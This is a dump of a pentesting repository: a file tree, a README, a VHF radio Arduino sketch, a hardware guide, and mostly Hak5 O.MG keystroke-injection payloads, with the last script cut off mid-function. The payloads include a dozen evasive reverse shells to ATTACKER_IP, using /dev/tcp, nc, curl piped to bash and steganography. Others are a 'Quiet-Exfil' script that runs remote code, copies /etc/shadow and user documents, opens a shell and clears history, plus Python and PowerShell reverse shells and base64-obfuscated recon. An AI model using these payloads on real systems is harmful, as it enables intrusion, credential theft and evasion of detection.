├── LICENSE ├── README.md ├── hardware ├── Bins │ └── HB0096_TwoMeter_Demo_Mod.ino ├── Electronic-Cats │ └── readme.md ├── Hak5-oMG │ ├── omg │ │ ├── Linux │ │ │ ├── Evasive-RevShell │ │ │ │ └── payload.txt │ │ │ ├── Obfuscated-Network-Recon │ │ │ │ └── payload.txt │ │ │ ├── Python-Reverse-Shell │ │ │ │ └── payload.txt │ │ │ ├── Quiet-Exfil │ │ │ │ └── payload.txt │ │ │ └── Setup-New-HIDX-Target-Client │ │ │ │ └── payload.txt │ │ ├── Windows │ │ │ ├── HelloWithLocation │ │ │ │ └── payload.txt │ │ │ ├── PS-Reverse-Shell │ │ │ │ └── payload.txt │ │ │ ├── SetupHIDX-TCP-EXFIL │ │ │ │ └── payload.txt │ │ │ └── SetupHIDXAirGapShell │ │ │ │ └── payload.txt │ │ ├── iOS │ │ │ └── OpenSafariLink │ │ │ │ └── payload.txt │ │ └── macOS │ │ │ ├── Locate-and-Alert-User │ │ │ └── badHello.txt │ │ │ ├── Python-Reverse-Shell │ │ │ └── payload.txt │ │ │ ├── Quiet-Shell │ │ │ └── payload.txt │ │ │ └── SetupHIDXTargetShell │ │ │ └── payload.txt │ ├── readme.md │ ├── rubberducky │ │ └── placeholder.md │ ├── sharkjack │ │ ├── LAMPooned │ │ │ └── payload.txt │ │ ├── byon-nmap.sh │ │ └── sneaky-beacon │ │ │ └── payload.txt │ └── utils │ │ └── iOS-URL-Map.md ├── Reversing │ └── macOS-tools-workflow.md └── Upgrades-Mods │ ├── Jhewitt5gmod.md │ ├── PimpMyNethunter.md │ └── ppkb_kali_nethunter_pinephone_install.md ├── repos ├── BurpPlugins.md └── repos-main.md ├── resources ├── Command-Line │ ├── grep.md │ └── pbCopy-Paste.md ├── OSINT │ ├── Dehashed-Cheatsheet.md │ ├── GuideLinks.md │ └── dorks │ │ ├── GitDorks.md │ │ ├── GoogleDorks.md │ │ ├── Readme.md │ │ ├── boxpiper.txt │ │ ├── disclosurePrograms.md │ │ ├── vsec7-list.txt │ │ └── webcam-otw.txt ├── SDR │ ├── Frequency-Ranges.md │ ├── WHAD-Command.md │ └── airspy-flightview.sh ├── methodology │ ├── API-Methodology.md │ ├── ExternalPentest.md │ ├── PhysicalPentest.md │ ├── PhysicalSecurityChecklist.md │ └── WebPentest.md ├── networking │ ├── Subnet-Guide.xlsx │ ├── Wireshark-Filters.md │ ├── attacks │ │ └── WiFi-Tool-Commands.md │ └── 
detection │ │ ├── Readme.md │ │ └── mirai.lua ├── payload-cheatsheets │ ├── XSS-cheatsheet.md │ ├── impacket-cheatsheet.md │ ├── msfvenom-cheatsheet.md │ ├── reverse-shells.md │ ├── veil-venom-shells.sh │ └── xss-strings.md ├── readme.md └── reporting │ ├── External-Pentest-Report.md │ ├── external_test_template.md │ └── img │ ├── readme.md │ └── rootdown_logo.png └── scripts ├── automation ├── AppendToNotion.sh ├── AutoSubdominer.sh ├── CyberRecon.sh ├── DomainWatchdog.sh ├── SubsToNotion.py ├── SubsToSQL.py └── TrendyWordlister.py ├── exfil └── lil-doc-snatcher.sh ├── exploits ├── buffer_jump.py ├── python-injection-example.sh └── veil-venom-shells.sh ├── foothold-to-escalation ├── Readme.md ├── escalateMyTools.py ├── traverserHunt.py └── winTools.sh ├── recon ├── OneLinerCollection.md ├── ipsweep.sh ├── maxrecon.sh ├── nmap-dir-vuln.txt ├── oneLineSubs.md ├── port-report.py ├── portscanner.py ├── smb-scan.sh ├── subrecon.sh ├── system-filescan.sh ├── theEnumerator.sh ├── tool-heavy.sh └── windows_cred_hunter.ps1 ├── security ├── detection │ ├── linux_mal_scanner.sh │ └── macos_malscan.sh └── hardening │ ├── LinuxSecure.sh │ ├── LinuxServerSecure.sh │ ├── MacSecure.sh │ └── WinSecure.bat └── utilities ├── CleanDir.py ├── DomainExtractor.py └── passwords ├── Readme.md ├── passgen.sh └── word_sentry.py /README.md: -------------------------------------------------------------------------------- 1 | ## `RDSec` 2 | `Made for red, purple and blue.` 3 | 4 | 5 | - [**Tools**](https://github.com/Root-Down-Digital/pentesting-resources/blob/main/repos/repos-main.md) • Browse a collection of tools curated for specific tasks from recon to post-op. 6 | 7 | - [**Scripts**](https://github.com/Root-Down-Digital/pentesting-resources/tree/main/scripts) • Automate monitoring, secure servers, find vulns & escalate privileges. 
8 | 9 | - [**Resources**](https://github.com/Root-Down-Digital/pentesting-resources/tree/main/resources) • Quick reference lists for OSINT, mobile & web and hardware hacking. *Methodology in the works.* 10 | 11 | - [**Hardware**](https://github.com/Root-Down-Digital/pentesting-resources/tree/main/hardware) • Hak5 & O.MG device payload templates. Other gadgets, SDR & reversing coming soon (Catsniffer, Magspoof…) 12 | 13 | --- 14 | > [!IMPORTANT] 15 | > The material in this repository, including all associated links and content, is provided solely for informational and educational purposes. The authors do not endorse or condone any illegal activity. Use this information responsibly and at your own risk. 16 | 17 | > _Huge thanks to every author of these sources. Feel free to contribute or suggest improvements! We believe in the power of community and collaboration. Every single contribution, however small, is valued and appreciated._ 18 | 19 | 20 | -------------------------------------------------------------------------------- /hardware/Bins/HB0096_TwoMeter_Demo_Mod.ino: -------------------------------------------------------------------------------- 1 | //============================================================================== 2 | // SA818-VHF Radio Demo from HackerBox 0096 - "Two Meter" - Modded with some various VHF frequencies. Ensure compliance and licensing before use. 
3 | 4 | // https://hackerboxes.com/products/hackerbox-0096-two-meter 5 | // 6 | // Radio channels are specified in two arrays 7 | // (one for frequency and one for a text nickname) 8 | // Button A cycles through channels which are received to the LINE OUT port 9 | // Button C is Push to Talk (transmit) - Do not use this feature without 10 | // proper licensure and while making required call sign identification 11 | // 12 | // This code was adapted from an SA818-U demo written by IMSAI Guy: 13 | // https://youtu.be/73b-Q6AwoNA 14 | //============================================================================== 15 | 16 | #include 17 | #include 18 | TFT_eSPI tft = TFT_eSPI(); 19 | 20 | #define SA818_AudioOn 17 21 | #define SA818_AF_OUT 38 //Analog input to MCU 22 | #define SA818_PTT 13 23 | #define SA818_PD 27 24 | #define SA818_HL 33 25 | #define SA818_RXD 21 26 | #define SA818_TXD 22 27 | #define SA818_AF_IN 25 //Analog output from MCU 28 | #define Button_A 15 29 | #define Button_B 26 30 | #define Button_C 32 31 | 32 | // All NOAA Weather Radio stations broadcast on one of seven frequencies in the VHF Public Service band: 33 | // 162.400 MHz, 162.425 MHz, 162.450 MHz, 162.475 MHz, 162.500 MHz, 162.525 MHz, and 162.550 MHz. 
34 | // https://www.weather.gov/phi/nwrfaq 35 | 36 | // Number of channels 37 | #define Channel_count 13 // Adjusted as per new channels 38 | 39 | // Frequency array 40 | double Frequency[Channel_count] = { 41 | 146.2500, 162.4000, 162.4250, 162.4500, 162.4750, 162.5000, 162.5250, 162.5500, 42 | 25.0000, 512.0000, 823.9875, 868.9875, 1300.0000 43 | }; 44 | 45 | // Channel names 46 | char *Channel_name[] = { 47 | "2m Test", "NOAA 1", "NOAA 2", "NOAA 3", "NOAA 4", "NOAA 5", "NOAA 6", "NOAA 7", 48 | "Custom 1", "Custom 2", "Custom 3", "Custom 4", "Custom 5" 49 | }; 50 | 51 | int Channel = 0; // current channel 52 | 53 | void setup(void) { 54 | Serial2.begin(9600, SERIAL_8N1, SA818_TXD, SA818_RXD); 55 | 56 | pinMode(Button_A, INPUT_PULLDOWN); 57 | pinMode(Button_B, INPUT_PULLDOWN); 58 | pinMode(Button_C, INPUT_PULLDOWN); 59 | 60 | pinMode(SA818_AudioOn, INPUT); //SA818 drives pin LOW to tell MCU that a signal is being received 61 | 62 | // SA818_AF_IN is an output from the MCU, but we set it as an INPUT when not in use 63 | pinMode(SA818_AF_IN, INPUT); 64 | 65 | //Output Power High/Low 66 | // High Power: Float (MCU=input) 67 | // Low Power: Drive pin LOW 68 | // INPORTANT NOTE: NEVER Drive the pin HIGH (undefined state) 69 | pinMode(SA818_HL, OUTPUT); 70 | digitalWrite(SA818_HL, LOW); 71 | 72 | pinMode(SA818_PTT, OUTPUT); //Push to Talk (Transmit) 73 | digitalWrite(SA818_PTT, HIGH); //(0=TX, 1=RX) DO NOT Transmit Without License 74 | 75 | pinMode(SA818_PD, OUTPUT); 76 | digitalWrite(SA818_PD, HIGH); //Release Powerdown (1=Radio ON) 77 | 78 | tft.init(); 79 | tft.setRotation(3); 80 | 81 | tft.fillScreen(TFT_BLACK); 82 | tft.drawRect(0, 0, tft.width(), tft.height(), TFT_WHITE); 83 | tft.setTextColor(TFT_RED); 84 | tft.setCursor(0, 40, 4); 85 | tft.println(" SA818-VHF Demo"); 86 | delay(3000); 87 | 88 | tft.fillScreen(TFT_BLACK); 89 | tft.setTextColor(TFT_YELLOW,TFT_BLACK); 90 | tft.setCursor(0, 0, 4); 91 | tft.println("Radio Connect:"); 92 | 
Serial2.println("AT+DMOCONNECT\r"); // connect communications with SA818 93 | tft.print(Serial2.readString()); // returns :0 if good 94 | tft.println("Radio Version:"); 95 | Serial2.print("AT+VERSION\r\n"); // get version 96 | tft.print(Serial2.readString()); // returns: version number 97 | delay(2000); 98 | 99 | tft.fillScreen(TFT_BLACK); 100 | tft.setCursor(0, 0, 4); 101 | tft.println("Set Group:"); // group set 102 | setfreq(); // set frequency 103 | tft.print(Serial2.readString()); // returns :0 if good 104 | 105 | tft.println("Set Volume: "); 106 | Serial2.print("AT+DMOSETVOLUME=8\r\n"); // set volume 107 | tft.print(Serial2.readString()); // returns :0 if good 108 | delay(2000); 109 | 110 | tft.fillScreen(TFT_BLACK); 111 | disp_channel(); 112 | } 113 | 114 | void loop() { 115 | if (digitalRead(Button_A)){ 116 | Channel += 1; // next channel 117 | if (Channel >= Channel_count) Channel=0; 118 | setfreq(); 119 | tft.fillScreen(TFT_BLACK); 120 | disp_channel(); 121 | delay(300); // debounce switch 122 | } 123 | 124 | if (digitalRead(Button_C)){ 125 | tft.fillScreen(TFT_RED); // RED Screen when transmitting 126 | disp_channel(); 127 | digitalWrite(SA818_PTT,LOW); // assert push to talk 128 | delay(300); // debounce switch 129 | while(digitalRead(Button_C)); 130 | digitalWrite(SA818_PTT,HIGH); // release push to talk 131 | tft.fillScreen(TFT_BLACK); // BLACK Screen when not transmitting 132 | disp_channel(); 133 | delay(1000); // wait for transmisson to end 134 | } 135 | } 136 | 137 | void setfreq() { 138 | Serial2.print("AT+DMOSETGROUP=0,"); 139 | Serial2.print(String(Frequency[Channel],4)); 140 | Serial2.print(","); 141 | Serial2.print(String(Frequency[Channel],4)); 142 | Serial2.print(",0000,1,0000\r\n"); 143 | } 144 | 145 | void disp_channel() { 146 | tft.setCursor(0, 0, 4); 147 | tft.setTextColor(TFT_BLUE,TFT_BLACK); 148 | tft.println("SA818-VHF Demo"); 149 | tft.setTextColor(TFT_YELLOW,TFT_BLACK); 150 | tft.print("Freq: "); 151 | 
tft.println(String(Frequency[Channel],4)); 152 | tft.print("Name: "); 153 | tft.println(Channel_name[Channel]); 154 | } 155 | -------------------------------------------------------------------------------- /hardware/Electronic-Cats/readme.md: -------------------------------------------------------------------------------- 1 | # Electronic Cats Hardware Guide 2 | 3 | ## CatSniffer 4 | 5 | ### [CatSniffer](https://github.com/ElectronicCats/CatSniffer/tree/master): Official repo 6 | 7 | **[Firmware](https://github.com/ElectronicCats/CatSniffer-Firmware)** 8 | 9 | | **Firmware Name** | **Supported Protocol** | **Description** | **Type of Devices** | **Frequency Range** | 10 | | --- | --- | --- | --- | --- | 11 | | **`SerialPassthroughwithboot`** | N/A | Enables serial communication between RP2040 and CC1352P7. | N/A | N/A | 12 | | **`catSniffer_LoRa`** | LoRa (SX1262) | Sniffs LoRa communications. | LoRa IoT devices | 863-870 MHz (EU), 902-928 MHz (US) | 13 | | **`Sniffle_CC1352P_7`** | Bluetooth Low Energy (BLE) | Sniffs BLE communication. | BLE IoT devices | 2.4-2.4835 GHz | 14 | | **`airtag_scanner_CC1352P_7`** | Bluetooth Low Energy (BLE) | Scans for Apple AirTag communications. | Apple AirTags | 2.4-2.4835 GHz | 15 | | **`airtag_spoofer_CC1352P_7`** | Bluetooth Low Energy (BLE) | Spoofs Apple AirTag communications. | Apple AirTags | 2.4-2.4835 GHz | 16 | | **`sniffer_fw_cc1252P_7`** | Sub 1 GHz, 2.4 GHz | Sniffs proprietary sub-GHz and 2.4 GHz communications. 
| IoT devices using Sub 1 GHz or 2.4 GHz | 315-928 MHz, 2.4-2.4835 GHz | 17 | 18 | **[Software](https://github.com/ElectronicCats/CatSniffer-Tools)** 19 | 20 | - `catnip_uploader`: Download and flash the latest releases using a python script 21 | - `cc2538-bsl`: Cross-platform script to upload firmware (.hex) to the CatSniffer 22 | - `pycatsniffer_bv3`: Cross-platform script for packet sniffing BLE, IEEE 802.15 & Zigbee 23 | 24 | > [!WARNING] 25 | > It is easy to brick the v1 and x2x by uploading the wrong chip FW. Examine the chip physically to determine `cc1352p1lp` or `cc1352r1lp`. Failure results in a state recoverable by JTAG only (v3x can be restored without additional hardware). 26 | 27 | ## MagSpoof 28 | ### [MagSpoof](https://github.com/ElectronicCats/magspoof): Official Repo 29 | 30 | #### 1. Functionality 31 | a. Read/save card programmatically 32 | b. Emulate strip via EMP 33 | c. Read > Save > Emulate OTG 34 | 35 | #### 2. PoC Features 36 | - [AMEX chip bypass & PIN prediction](https://github.com/vaginessa/chip-n-pin-magspoof) Can disable Chip-and-PIN. Correctly predicts Amex credit card numbers + expirations from previous card number 37 | - New Findings 38 | 39 | > [!IMPORTANT] 40 | > All new findings subject to responsible disclosure and other ethical and legal obligations. Anything here is common knowledge. 41 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Linux/Evasive-RevShell/payload.txt: -------------------------------------------------------------------------------- 1 | REM Pick ONE of the methods below 2 | REM Opening/closing a terminal window for the command can be found in other payloads, adjust delay as needed 3 | 4 | REM To disable the spawned shells: 5 | REM 1. If using process masquerading with a custom name: pkill -f legitimate_process_name 6 | REM 2. For all other reverse shells: pkill -f 'bash -i' 7 | 8 | REM 1. 
Process Masquerading: This method renames the reverse shell process to a more legitimate name to avoid suspicion. 9 | REM STRING bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown; exec -a legitimate_process_name bash' 10 | REM ENTER 11 | 12 | REM 2. Using Legitimate Tools for Execution: Utilizes the "nohup" command to run the reverse shell in the background, even after the terminal closes, reducing detectability. 13 | REM STRING nohup /bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown 14 | REM ENTER 15 | 16 | REM 3. Disabling Logging: Temporarily redirects standard output and error streams to /dev/null, ensuring no logs are written during the execution of the reverse shell. 17 | REM STRING exec 3>&1 4>&2; exec 1>/dev/null 2>/dev/null; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown; exec 1>&3 2>&4 18 | REM ENTER 19 | 20 | REM 4. Stealth Mode Execution: Uses "nohup" and "disown" to execute the reverse shell with minimal visibility in the terminal, making the process less noticeable. 21 | REM STRING bash -c 'nohup bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown' 22 | REM ENTER 23 | 24 | REM 5. Fork Bomb Prevention: Ensures that only a limited number of bash processes are running to prevent overwhelming the system, then executes the reverse shell. 25 | REM STRING bash -c '[[ $(pgrep bash | wc -l) -lt 5 ]] && bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown' 26 | REM ENTER 27 | 28 | REM 6. User Interaction Detection: Checks if the system is idle (no active sessions) before executing the reverse shell, reducing the chance of immediate detection by a user. 29 | REM STRING bash -c 'if [[ -z $(who -T | grep "+" | awk "{print $6}") ]]; then bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown; fi' 30 | REM ENTER 31 | 32 | REM 7. Network Evasion: Executes the reverse shell by downloading and running a script from a remote server, masking it as a legitimate network request. 
33 | REM STRING bash -c 'curl http://ATTACKER_IP:PORT/shell.sh | bash & disown' 34 | REM ENTER 35 | 36 | REM 8. Memory-resident Execution: Encodes the reverse shell command into a base64 string, decodes, and executes it directly from memory, avoiding disk I/O to reduce detection. 37 | REM STRING echo 'bash -c "exec -a legitimate_process_name nohup bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"' | base64 | base64 -d | bash & disown 38 | REM ENTER 39 | 40 | REM 9. Named Pipe (FIFO) Execution: Uses a named pipe (FIFO) for executing the reverse shell, which can help in bypassing traditional process monitoring mechanisms. 41 | REM STRING mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc ATTACKER_IP PORT > /tmp/f & disown 42 | REM ENTER 43 | 44 | REM 10. Steganography-based Execution: Hides the reverse shell payload within an image file using steganography. The script extracts and executes the payload from the image. Follow the two setup commands to build the payload image. 45 | REM Step 1: Create the reverse shell payload. 46 | REM echo 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' > payload.sh 47 | REM Step 2: Embed the payload into an image using steghide. 48 | REM steghide embed -cf original_image.png -ef payload.sh -sf payload.png -p "password" 49 | REM Step 3: Host the payload.png on a web server for remote execution and run the payload 50 | REM STRING wget http://ATTACKER_IP/payload.png -O /tmp/payload.png; steghide extract -sf /tmp/payload.png -xf /tmp/payload.sh -p "password"; bash /tmp/payload.sh & disown 51 | REM ENTER 52 | 53 | REM 11. Environmental Variable Hijacking: Modifies the PATH environment variable to include the reverse shell command, which is executed whenever a command is run in the shell. 54 | REM STRING export PATH=$(echo $PATH | sed 's/:/;bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown;/') 55 | REM ENTER 56 | 57 | REM 12. 
Signal-based Trigger: Sets a trap to execute the reverse shell only when a specific signal (e.g., HUP) is received, delaying execution until the signal is triggered. 58 | REM STRING trap 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown' HUP; kill -HUP $$ 59 | REM ENTER 60 | 61 | REM 13. Dynamic Linker Hijacking: Uses the LD_PRELOAD environment variable to inject a shared object that contains the reverse shell payload, executing it before any other command. 62 | REM STRING LD_PRELOAD=/tmp/payload.so bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 & disown 63 | REM ENTER 64 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Linux/Obfuscated-Network-Recon/payload.txt: -------------------------------------------------------------------------------- 1 | DELAY 500 2 | REM Description: Pentest payload with obfuscation for gathering network intelligence and resources 3 | 4 | REM Open Terminal 5 | GUI SPACE 6 | DELAY 500 7 | STRING Terminal 8 | ENTER 9 | DELAY 500 10 | 11 | REM Create directory for output on USB 12 | STRING mkdir -p /root/loot/network_intel 13 | ENTER 14 | DELAY 500 15 | 16 | REM Check if the directory was created 17 | STRING eval $(echo aWYgWyAhIC1kICIvbWVkaWEvdXNiL2xvb3QvbmV0d29ya19pbnRlbCIgXTsgdGhlbiBlY2hvICJGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeS4iICYmIGV4aXQgMTsgZmk= | base64 --decode) 18 | ENTER 19 | DELAY 500 20 | 21 | REM Gather network interfaces configuration 22 | STRING eval $(echo aWZjb25maWcgPiAvbWVkaWEvdXNiL2xvb3QvbmV0d29ya19pbnRlbC9pZmNvbmZpZy50eHQ= | base64 --decode) 23 | ENTER 24 | DELAY 500 25 | 26 | REM List all active listening ports and their programs 27 | STRING eval $(echo bmV0c3RhdCAtdHVsbgo= | base64 --decode) > /media/usb/loot/network_intel/netstat.txt 28 | ENTER 29 | DELAY 500 30 | 31 | REM List all running processes 32 | STRING eval $(echo cHMgYXV4Cg== | base64 --decode) > /media/usb/loot/network_intel/processes.txt 33 | ENTER 34 | DELAY 500 35 | 36 | REM List all SMB shares 37 | 
STRING eval $(echo c21iY2xpZW50IC1MIGxvY2FsaG9zdCAtTgo= | base64 --decode) > /media/usb/loot/network_intel/smb_shares.txt 38 | ENTER 39 | DELAY 500 40 | 41 | REM List all printers 42 | STRING eval $(echo bHBzdGF0IC1hCg== | base64 --decode) > /media/usb/loot/network_intel/printers.txt 43 | ENTER 44 | DELAY 500 45 | 46 | REM Perform a ping scan in the local network to discover active hosts 47 | STRING eval $(echo bm1hcCAtc1AgMTkyLjE2OC4xLjAvMjQK | base64 --decode) > /media/usb/loot/network_intel/nmap.txt 48 | ENTER 49 | DELAY 500 50 | 51 | REM List all network connections 52 | STRING eval $(echo bHNvZiAtaQo= | base64 --decode) > /media/usb/loot/network_intel/connections.txt 53 | ENTER 54 | DELAY 500 55 | 56 | REM Display the ARP table 57 | STRING eval $(echo YXJwIC1hCg== | base64 --decode) > /media/usb/loot/network_intel/arp.txt 58 | ENTER 59 | DELAY 500 60 | 61 | REM Exit the terminal 62 | STRING exit 63 | ENTER 64 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Linux/Python-Reverse-Shell/payload.txt: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI 3 | SPACE 4 | STRING Terminal 5 | ENTER 6 | DELAY 3000 7 | STRING python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' 8 | ENTER 9 | GUI h -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Linux/Quiet-Exfil/payload.txt: -------------------------------------------------------------------------------- 1 | DELAY 500 2 | REM Description: This script downloads a remote script, performs data exfiltration, sets up a reverse shell, and cleans its traces, demonstrating a comprehensive USB keystroke injection penetration test. 
3 | 4 | REM Open Terminal 5 | GUI SPACE 6 | DELAY 500 7 | STRING Terminal 8 | ENTER 9 | DELAY 500 10 | 11 | REM Download and run a script from a remote server 12 | STRING curl http://your-server.com/script.sh | sh 13 | ENTER 14 | DELAY 1000 15 | 16 | REM Create directories 17 | STRING mkdir -p /exfilit/files 18 | ENTER 19 | DELAY 500 20 | 21 | REM Attempt to copy user data if read permissions are available 22 | STRING if [ -r /etc/passwd ]; then cp /etc/passwd /exfilit/files; fi 23 | ENTER 24 | STRING if [ -r /etc/shadow ]; then cp /etc/shadow /exfilit/files; fi 25 | ENTER 26 | DELAY 500 27 | 28 | REM Find and copy files under 70MB 29 | STRING find ~/Documents ~/Downloads -type f -size -70M -exec cp -n {} /exfilit/files \; 30 | ENTER 31 | 32 | REM Set up a reverse shell for persistent access 33 | STRING bash -i >& /dev/tcp/your-server.com/8080 0>&1 & 34 | ENTER 35 | 36 | REM Clean up any trace of its actions from system logs 37 | STRING history -c 38 | ENTER 39 | STRING rm ~/.bash_history 40 | ENTER 41 | 42 | REM Exit the terminal 43 | STRING exit 44 | ENTER 45 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Linux/Setup-New-HIDX-Target-Client/payload.txt: -------------------------------------------------------------------------------- 1 | STRINGLN_BLOCK 2 | screen 3 | launchstshell(){ 4 | RSHELL="/bin/dash" 5 | HIDDEV=$(dmesg|grep -i "D3C0:D34D" |grep hiddev|grep hidraw|tail -n1|sed -e "s/.*hidraw/hidraw/g" -e "s/:.*//g") 6 | if [ ! 
-z "$HIDDEV" ]; then 7 | echo "launching shell on /dev/$HIDDEV" 8 | $RSHELL -c "$RSHELL -i < /dev/$HIDDEV > /dev/$HIDDEV 2>&1" 9 | else 10 | echo "Unable to launch shell, no known device" 11 | fi 12 | } 13 | launchstshell 14 | CTRL a 15 | DELAY 250 16 | CTRL d 17 | END_STRINGLN -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Windows/HelloWithLocation/payload.txt: -------------------------------------------------------------------------------- 1 | REM For Windows and MacOS: Make the computer say a personalized fun message including geolocation 2 | DELAY 500 3 | 4 | REM Try the Windows way (this will do nothing on MacOS) 5 | GUI d 6 | DELAY 500 7 | GUI r 8 | DELAY 500 9 | STRING powershell "Add-Type -TypeDefinition 'public class Speech { public void Speak(string text) { (New-Object -ComObject SAPI.SpVoice).Speak(text); } }'; $location = Invoke-RestMethod -Uri 'http://ip-api.com/json/'; (New-Object Speech).Speak('Don\'t mind me, ' + [Environment]::UserName + ', I\'m just a talking computer in ' + $location.city + ', ' + $location.regionName + ', ' + $location.country + '.'); exit;" 10 | ENTER 11 | 12 | REM Try the MacOS way (this will do nothing on Windows) 13 | GUI SPACE 14 | DELAY 500 15 | STRING Terminal 16 | ENTER 17 | DELAY 500 18 | STRING location=$(curl -s http://ip-api.com/json/); say "Don't mind me, $(whoami), I'm just a talking computer in $(echo $location | jq -r '.city'), $(echo $location | jq -r '.regionName'), $(echo $location | jq -r '.country')."; exit; 19 | ENTER 20 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Windows/PS-Reverse-Shell/payload.txt: -------------------------------------------------------------------------------- 1 | REM Adapted from Hak5 payload 2 | REM @@ Opening the CMD 3 | GUI r 4 | DELAY 500 5 | STRING cmd.exe 6 | ENTER 7 | DELAY 500 8 | 9 | REM @@ Executing the PowerShell reverse shell 10 | STRING powershell -nop -c 
"$socket = new-object System.Net.Sockets.TcpClient('192.168.0.112', 8080); if($socket -eq $null){exit 1} $stream = $socket.GetStream(); $writer = new-object System.IO.StreamWriter($stream); $buffer = new-object System.Byte[] 1024; $encoding = new-object System.Text.AsciiEncoding; do{ $writer.Write('> '); $writer.Flush(); $read = $null; while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null){} $out = $encoding.GetString($buffer, 0, $read).Replace('`r`n','').Replace('`n',''); if(!$out.equals('exit')){ $out = $out.split(' ') $res = [string](&$out[0] $out[1..$out.length]); if($res -ne $null){ $writer.WriteLine($res)} }While (!$out.equals('exit')) $writer.close();$socket.close();" 11 | ENTER 12 | DELAY 500 13 | 14 | REM @@ Changing the color and resizing the CMD 15 | STRING color FE && mode con: cols=18 lines=1 16 | ENTER 17 | DELAY 200 18 | 19 | REM @@ Minimizing the CMD 20 | ALT SPACE 21 | STRING n 22 | ENTER -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/Windows/SetupHIDX-TCP-EXFIL/payload.txt: -------------------------------------------------------------------------------- 1 | REM HIDX_Stealth_Link_TCP_Exfil_Airgapped 2 | REM Version 1.0 3 | REM OS: Windows 4 | REM Author: Wasabi 5 | REM Requirements: Firmware Version 3.0 minimum, Activated HIDX 6 | 7 | REM HID based exfiltration payload, executed directly in powershell. 
8 | 9 | DUCKY_LANG us 10 | FUNCTION WIN_WRITEFILE() 11 | DELAY 1000 12 | GUI r 13 | DELAY 1000 14 | STRINGLN cmd 15 | DELAY 1000 16 | STRINGLN del %USERPROFILE%\#VAR1 17 | STRINGLN notepad.exe&&exit 18 | DELAY 2000 19 | END_FUNCTION 20 | 21 | FUNCTION WIN_SAVEANDSTARTCMD() 22 | DELAY 2000 23 | CTRL s 24 | DELAY 2000 25 | ALT n 26 | DELAY 2000 27 | STRING %USERPROFILE%\#VAR1 28 | DELAY 2000 29 | ENTER 30 | DELAY 1000 31 | GUI r 32 | DELAY 500 33 | END_FUNCTION 34 | 35 | DELAY 2000 36 | WIN_WRITEFILE(win-hidexfil.ps1) 37 | STRINGLN_BLOCK 38 | <# 39 | HIDXExfil.ps1 40 | Author: Ø1phor1³ (@01p8or13) 41 | Acknowledgements: spiceywasabi, rogandawes 42 | Required Dependencies: Activated HIDX on OMG Elite device 43 | #> 44 | 45 | function HIDXExfil { 46 | <# 47 | .DESCRIPTION 48 | A "low and slow" method of covert exfiltration meant to provide alternate 49 | pentesting pathways beyond using the target host’s network interfaces or 50 | mass storage. 51 | This POC will allow data exfiltration back to the O.MG’s flash storage or 52 | act as a proxy between the target host and another device, via the O.MG 53 | Device's built-in WiFi interface, which can allow you to receive data via listeners 54 | like nc, netcat, or similar tools. 55 | This is a POC 56 | 57 | .PARAMETER Message 58 | Message which gets exfiltrated. 59 | 60 | .PARAMETER VendorID 61 | Defining vendor ID of the device. (Default: D3C0) 62 | 63 | .PARAMETER ProductID 64 | Defining product ID of the device. 
(Default: D34D) 65 | 66 | .EXAMPLE 67 | Defining a message: 68 | HIDXExfil -Message "hello world" 69 | 70 | .EXAMPLE 71 | HIDX usage with every parameter: 72 | HIDXExfil -VendorID D3C0 -ProductID D34D -Message "test" 73 | 74 | .EXAMPLE 75 | Piping output into HIDX: 76 | whoami | HIDXExfil 77 | 78 | .EXAMPLE 79 | Exfiltrating systeminfo with proper formatting: 80 | systeminfo | Out-String | HIDXExfil 81 | 82 | .LINK 83 | https://github.com/0iphor13 84 | https://github.com/spiceywasabi 85 | https://github.com/rogandawes 86 | 87 | #Credits to Rogan for the idea of filehandle and device identification 88 | X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* amsiscanbuffer 89 | #> 90 | 91 | [cmdletbinding()] 92 | param( 93 | [Parameter( 94 | Mandatory = $true, 95 | ValueFromPipeline = $true)] 96 | $Message, 97 | 98 | [Parameter(Position = 1)] 99 | [ValidateNotNullOrEmpty()] 100 | [String] 101 | $VendorID = "D3C0", #Default value 102 | 103 | [Parameter(Position = 2)] 104 | [ValidateNotNullOrEmpty()] 105 | [String] 106 | $ProductID = "D34D" # Default value 107 | ) 108 | 109 | $omg = $VendorID + "&PID_" + $ProductID 110 | function Get-OMGDevice(){ 111 | #Identify OMG device 112 | $devs = gwmi Win32_USBControllerDevice 113 | $devicestring=$null 114 | foreach ($dev in $devs) { 115 | $wmidev = [wmi]$dev.Dependent 116 | if ($wmidev.GetPropertyValue('DeviceID') -match ($omg) -and ($null -eq $wmidev.GetPropertyValue('Service'))) { 117 | $devicestring = ([char]92+[char]92+'?'+[char]92 + $wmidev.GetPropertyValue('DeviceID').ToString().Replace([char]92,[char]35) + [char]35+'{4d1e55b2-f16f-11cf-88cb-001111000030}') 118 | } 119 | } 120 | 121 | return $devicestring 122 | } 123 | 124 | function Send-Message { 125 | param( 126 | 